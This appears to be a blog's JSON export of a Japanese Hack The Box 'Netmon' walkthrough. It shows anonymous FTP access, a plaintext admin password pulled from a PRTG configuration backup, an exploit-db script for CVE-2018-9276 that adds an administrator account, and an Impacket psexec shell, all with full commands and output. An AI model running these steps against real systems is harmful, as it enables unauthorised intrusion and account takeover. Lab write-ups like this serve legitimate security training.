{"id":3734,"date":"2020-08-16T04:12:17","date_gmt":"2020-08-15T19:12:17","guid":{"rendered":"https:\/\/tech.akat.info\/?p=3734"},"modified":"2020-08-30T23:33:28","modified_gmt":"2020-08-30T14:33:28","slug":"hack-the-box-netmon-walkthrough","status":"publish","type":"post","link":"https:\/\/tech.akat.info\/?p=3734","title":{"rendered":"Hack The Box &#8211; Netmon &#8211; Walkthrough"},"content":{"rendered":"<h3>FTP\u304c\u516c\u958b\u3055\u308c\u3066\u3044\u308b<\/h3>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\nnmap -A -n -F -T5 netmon.htb\r\nStarting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-08-15 15:31 UTC\r\nNmap scan report for netmon.htb (10.10.10.152)\r\nHost is up (0.045s latency).\r\nNot shown: 95 filtered ports\r\nPORT    STATE SERVICE      VERSION\r\n21\/tcp  open  ftp          Microsoft ftpd\r\n| ftp-anon: Anonymous FTP login allowed (FTP code 230)\r\n| 02-03-19  12:18AM                 1024 .rnd\r\n| 02-25-19  10:15PM       &lt;DIR&gt;          inetpub\r\n| 07-16-16  09:18AM       &lt;DIR&gt;          PerfLogs\r\n| 02-25-19  10:56PM       &lt;DIR&gt;          Program Files\r\n| 02-03-19  12:28AM       &lt;DIR&gt;          Program Files (x86)\r\n| 02-03-19  08:08AM       &lt;DIR&gt;          Users\r\n|_02-25-19  11:49PM       &lt;DIR&gt;          Windows\r\n| ftp-syst:\r\n|_  SYST: Windows_NT\r\n80\/tcp  open  http         Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)\r\n|_http-server-header: PRTG\/18.1.37.13946\r\n|_http-title: PRTG Starting...\r\n|_http-trane-info: Problem with XML parsing of \/evox\/about\r\n135\/tcp open  msrpc        Microsoft Windows RPC\r\n139\/tcp open  netbios-ssn  Microsoft Windows netbios-ssn\r\n445\/tcp open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds\r\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\r\nDevice type: printer|switch\r\nRunning (JUST GUESSING): HP embedded (85%), Dell embedded (85%)\r\nOS CPE: cpe:\/h:hp:designjet_650c cpe:\/h:dell:powerconnect_5424\r\nAggressive OS guesses: HP DesignJet 650C printer (85%), Dell PowerConnect 5424 switch (85%)\r\nNo exact OS matches for host (test conditions non-ideal).\r\nNetwork Distance: 2 hops\r\nService Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:\/o:microsoft:windows\r\n\r\nHost script results:\r\n|_clock-skew: mean: 5m31s, deviation: 0s, median: 5m30s\r\n|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)\r\n| smb-security-mode:\r\n|   account_used: guest\r\n|   authentication_level: user\r\n|   challenge_response: supported\r\n|_  message_signing: disabled (dangerous, but default)\r\n| smb2-security-mode:\r\n|   2.02:\r\n|_    Message signing enabled but not required\r\n| smb2-time:\r\n|   date: 2020-08-15T15:37:45\r\n|_  start_date: 2020-08-15T15:36:49\r\n<\/pre>\n<h3>FTP\u63a5\u7d9a\u3057\u3066user.txt\u3092\u53d6\u5f97\u3059\u308b<\/h3>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\n# ftp netmon.htb\r\nConnected to netmon.htb.\r\n220 Microsoft FTP Service\r\nName (netmon.htb:root): anonymous\r\n331 Anonymous access allowed, send identity (e-mail name) as password.\r\nPassword:\r\n230 User logged in.\r\nRemote system type is Windows_NT.\r\n\r\nftp&gt; passive\r\nPassive mode on.\r\n\r\nftp&gt; ls\r\n227 Entering Passive Mode (10,10,10,152,207,23).\r\n150 Opening ASCII mode data connection.\r\n02-03-19  12:18AM                 1024 .rnd\r\n02-25-19  10:15PM       &lt;DIR&gt;          inetpub\r\n07-16-16  09:18AM       &lt;DIR&gt;          PerfLogs\r\n02-25-19  10:56PM       &lt;DIR&gt;          Program Files\r\n02-03-19  12:28AM       &lt;DIR&gt;          Program Files (x86)\r\n02-03-19  08:08AM       &lt;DIR&gt;          Users\r\n02-25-19  11:49PM       &lt;DIR&gt;          Windows\r\n226 Transfer complete.\r\n\r\nftp&gt; cd Users\\Public\r\n250 CWD command successful.\r\n\r\nftp&gt; dir\r\n227 Entering Passive Mode (10,10,10,152,207,27).\r\n125 Data connection already open; Transfer starting.\r\n02-03-19  08:05AM       &lt;DIR&gt;          Documents\r\n07-16-16  09:18AM       &lt;DIR&gt;          Downloads\r\n07-16-16  09:18AM       &lt;DIR&gt;          Music\r\n07-16-16  09:18AM       &lt;DIR&gt;          Pictures\r\n02-03-19  12:35AM                   33 user.txt\r\n07-16-16  09:18AM       &lt;DIR&gt;          Videos\r\n226 Transfer complete.\r\n\r\nftp&gt; mget user.txt\r\nmget user.txt? y\r\n227 Entering Passive Mode (10,10,10,152,207,29).\r\n125 Data connection already open; Transfer starting.\r\nWARNING! 1 bare linefeeds received in ASCII mode\r\nFile may not have transferred correctly.\r\n226 Transfer complete.\r\n33 bytes received in 0.20 secs (0.1649 kB\/s)\r\n<\/pre>\n<h3>80\u756a\u30dd\u30fc\u30c8\u306b\u30a2\u30af\u30bb\u30b9\u3057\u3066\u307f\u308b<\/h3>\n<p>PRTG Network Monitor (NETMON) \u306a\u308b\u3082\u306e\u304c\u52d5\u4f5c\u3057\u3066\u3044\u308b\u3002<br \/>\n<a href=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-16_040940.png\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-16_040940-300x149.png\" alt=\"\" width=\"300\" height=\"149\" class=\"alignnone size-medium wp-image-3735\" srcset=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-16_040940-300x149.png 300w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-16_040940-1024x508.png 1024w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-16_040940-768x381.png 768w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-16_040940-1536x762.png 1536w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-16_040940.png 2002w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>\u30c7\u30fc\u30bf\u30d5\u30a1\u30a4\u30eb\u306bFTP\u3067\u30a2\u30af\u30bb\u30b9\u3059\u308b\u3068\u3001config\u30d5\u30a1\u30a4\u30eb\u306e\u30d0\u30c3\u30af\u30a2\u30c3\u30d7\u3092\u53d6\u5f97\u3067\u304d\u308b\u3002<br \/>\n<a href=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-16_030733.png\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-16_030733-300x144.png\" alt=\"\" width=\"300\" height=\"144\" class=\"alignnone size-medium wp-image-3736\" srcset=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-16_030733-300x144.png 300w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-16_030733-1024x492.png 1024w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-16_030733-768x369.png 768w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-16_030733.png 1434w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\nftp&gt; cd &quot;Users\\All Users\\Paessler\\PRTG Network Monitor\\&quot;\r\n250 CWD command successful.\r\n\r\nftp&gt; ls\r\n227 Entering Passive Mode (10,10,10,152,207,212).\r\n125 Data connection already open; Transfer starting.\r\n08-15-20  12:18PM       &lt;DIR&gt;          Configuration Auto-Backups\r\n08-15-20  11:37AM       &lt;DIR&gt;          Log Database\r\n02-03-19  12:18AM       &lt;DIR&gt;          Logs (Debug)\r\n02-03-19  12:18AM       &lt;DIR&gt;          Logs (Sensors)\r\n02-03-19  12:18AM       &lt;DIR&gt;          Logs (System)\r\n08-15-20  11:37AM       &lt;DIR&gt;          Logs (Web Server)\r\n08-15-20  11:42AM       &lt;DIR&gt;          Monitoring Database\r\n02-25-19  10:54PM              1189697 PRTG Configuration.dat\r\n02-25-19  10:54PM              1189697 PRTG Configuration.old\r\n07-14-18  03:13AM              1153755 PRTG Configuration.old.bak\r\n08-15-20  01:42PM              1713485 PRTG Graph Data Cache.dat\r\n02-25-19  11:00PM       &lt;DIR&gt;          Report PDFs\r\n02-03-19  12:18AM       &lt;DIR&gt;          System Information Database\r\n02-03-19  12:40AM       &lt;DIR&gt;          Ticket Database\r\n02-03-19  12:18AM       &lt;DIR&gt;          ToDo Database\r\n226 Transfer complete.\r\n\r\nftp&gt; mget &quot;PRTG Configuration.old.bak&quot;\r\nmget PRTG Configuration.old.bak? y\r\n227 Entering Passive Mode (10,10,10,152,207,228).\r\n125 Data connection already open; Transfer starting.\r\n226 Transfer complete.\r\n1153755 bytes received in 3.23 secs (348.8171 kB\/s)\r\n<\/pre>\n<h3>\u30d0\u30c3\u30af\u30a2\u30c3\u30d7\u30d5\u30a1\u30a4\u30eb\u306e\u8a8d\u8a3c\u60c5\u5831\u3067\u30ed\u30b0\u30a4\u30f3\u3059\u308b<\/h3>\n<p>\u5148\u307b\u3069\u53d6\u5f97\u3057\u305f\u30d0\u30c3\u30af\u30a2\u30c3\u30d7\u30d5\u30a1\u30a4\u30eb\u3092\u78ba\u8a8d\u3059\u308b\u3068 PrTg@dmin2018 \u304c\u53d6\u5f97\u3067\u304d\u308b\u3002<\/p>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\n# cat PRTG\\ Configuration.old.bak | grep -A 1 prtgadmin\r\n              &lt;!-- User: prtgadmin --&gt;\r\n              PrTg@dmin2018\r\n<\/pre>\n<p>\u3053\u308c\u3067\u306f\u30ed\u30b0\u30a4\u30f3\u3067\u304d\u305a\u3001\u65e5\u4ed8\u304b\u3089\u30d1\u30b9\u30ef\u30fc\u30c9\u304c PrTg@dmin2019 \u3067\u3042\u308b\u3053\u3068\u3092\u63a8\u6e2c\u3057\u3066\u30ed\u30b0\u30a4\u30f3\u3059\u308b\u3002<br \/>\n<a href=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-16_032132.png\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-16_032132-300x35.png\" alt=\"\" width=\"300\" height=\"35\" class=\"alignnone size-medium wp-image-3737\" srcset=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-16_032132-300x35.png 300w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-16_032132-768x91.png 768w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-16_032132.png 949w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>\u63a2\u3057\u3066\u307f\u305f\u304cadministrator\u306e\u624b\u639b\u304b\u308a\u306f\u898b\u3064\u304b\u3089\u306a\u3044\u3002<\/p>\n<h3>PRTG Network Monitor (NETMON) \u306e\u8106\u5f31\u6027\u3092\u63a2\u3059<\/h3>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\n# searchsploit prtg\r\n------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------\r\n Exploit Title                                                                                                                                         |  Path\r\n------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------\r\nPRTG Network Monitor 18.2.38 - (Authenticated) Remote Code Execution                                                                                   | windows\/webapps\/46527.sh\r\nPRTG Network Monitor &lt; 18.1.39.1648 - Stack Overflow (Denial of Service)                                                                               | windows_x86\/dos\/44500.py\r\nPRTG Traffic Grapher 6.2.1 - 'url' Cross-Site Scripting                                                                                                | java\/webapps\/34108.txt\r\n------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------\r\nShellcodes: No Results\r\n\r\n# searchsploit -m windows\/webapps\/46527.sh\r\n  Exploit: PRTG Network Monitor 18.2.38 - (Authenticated) Remote Code Execution\r\n      URL: https:\/\/www.exploit-db.com\/exploits\/46527\r\n     Path: \/usr\/share\/exploitdb\/exploits\/windows\/webapps\/46527.sh\r\nFile Type: Bourne-Again shell script, ASCII text executable, with very long lines, with CRLF line terminators\r\n\r\nCopied to: \/home\/shimizu\/netmon\/46527.sh\r\n\r\n# .\/46527.sh -u http:\/\/10.10.10.152 -c &quot;_ga=GA1.2.1241551964.1597505933; _gid=GA1.2.1239716465.1597505933; OCTOPUS1813713946=e0RERDI4MEQ2LUFCNTYtNEVENi1CRjJBLUU5RjcxNUI4MzE1Nn0%3D; _gat=1&quot;\r\nbash: .\/46527.sh: \/bin\/bash^M: bad interpreter: No such file or directory\r\n\r\n# sed -i 's\/\\r\/\/' 46527.sh\r\n\r\n# .\/46527.sh -u http:\/\/10.10.10.152 -c &quot;_ga=GA1.2.1241551964.1597505933; _gid=GA1.2.1239716465.1597505933; OCTOPUS1813713946=e0RERDI4MEQ2LUFCNTYtNEVENi1CRjJBLUU5RjcxNUI4MzE1Nn0%3D; _gat=1&quot;\r\n\r\n&#x5B;+]#########################################################################&#x5B;+]\r\n&#x5B;*] Authenticated PRTG network Monitor remote code execution                &#x5B;*]\r\n&#x5B;+]#########################################################################&#x5B;+]\r\n&#x5B;*] Date: 11\/03\/2019                                                        &#x5B;*]\r\n&#x5B;+]#########################################################################&#x5B;+]\r\n&#x5B;*] Author: https:\/\/github.com\/M4LV0   lorn3m4lvo@protonmail.com            &#x5B;*]\r\n&#x5B;+]#########################################################################&#x5B;+]\r\n&#x5B;*] Vendor Homepage: https:\/\/www.paessler.com\/prtg                          &#x5B;*]\r\n&#x5B;*] Version: 18.2.38                                                        &#x5B;*]\r\n&#x5B;*] CVE: CVE-2018-9276                                                      &#x5B;*]\r\n&#x5B;*] Reference: https:\/\/www.codewatch.org\/blog\/?p=453                        &#x5B;*]\r\n&#x5B;+]#########################################################################&#x5B;+]\r\n\r\n# login to the app, default creds are prtgadmin\/prtgadmin. once athenticated grab your cookie and use it with the script.\r\n# run the script to create a new user 'pentest' in the administrators group with password 'P3nT3st!'\r\n\r\n&#x5B;+]#########################################################################&#x5B;+]\r\n\r\n &#x5B;*] file created\r\n &#x5B;*] sending notification wait....\r\n\r\n &#x5B;*] adding a new user 'pentest' with password 'P3nT3st'\r\n &#x5B;*] sending notification wait....\r\n\r\n &#x5B;*] adding a user pentest to the administrators group\r\n &#x5B;*] sending notification wait....\r\n\r\n\r\n &#x5B;*] exploit completed new user 'pentest' with password 'P3nT3st!' created have fun!\r\n<\/pre>\n<p>Cookie\u306f\u5148\u307b\u3069\u30ed\u30b0\u30a4\u30f3\u3057\u305f\u30d6\u30e9\u30a6\u30b6\u60c5\u5831\u304b\u3089\u5165\u624b\u3057\u305f\u3002<br \/>\n<a href=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-16_033229.png\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-16_033229-300x110.png\" alt=\"\" width=\"300\" height=\"110\" class=\"alignnone size-medium wp-image-3738\" srcset=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-16_033229-300x110.png 300w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-16_033229-1024x376.png 1024w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-16_033229-768x282.png 768w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-16_033229-1536x565.png 1536w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-16_033229-2048x753.png 2048w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<h3>pentest\u30e6\u30fc\u30b6\u3067root.txt\u3092\u53d6\u5f97\u3059\u308b<\/h3>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\n# cd \/usr\/share\/doc\/python3-impacket\/examples\r\n# python3 psexec.py pentest:'P3nT3st!'@10.10.10.152\r\nImpacket v0.9.21 - Copyright 2020 SecureAuth Corporation\r\n\r\n&#x5B;*] Requesting shares on 10.10.10.152.....\r\n&#x5B;*] Found writable share ADMIN$\r\n&#x5B;*] Uploading file CTXMidGW.exe\r\n&#x5B;*] Opening SVCManager on 10.10.10.152.....\r\n&#x5B;*] Creating service Gvmj on 10.10.10.152.....\r\n&#x5B;*] Starting service Gvmj.....\r\n&#x5B;!] Press help for extra shell commands\r\nMicrosoft Windows &#x5B;Version 10.0.14393]\r\n(c) 2016 Microsoft Corporation. All rights reserved.\r\n\r\nC:\\Windows\\system32&gt;type C:\\Users\\Administrator\\Desktop\\root.txt\r\n3018977fb944bf1878f75b879fba67cc\r\n<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>FTP\u304c\u516c\u958b\u3055\u308c\u3066\u3044\u308b nmap -A -n -F -T5 netmon.htb Starting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-08-15 15:31 UTC Nmap  [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[100,98],"tags":[],"_links":{"self":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3734"}],"collection":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3734"}],"version-history":[{"count":2,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3734\/revisions"}],"predecessor-version":[{"id":3784,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3734\/revisions\/3784"}],"wp:attachment":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3734"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3734"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3734"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}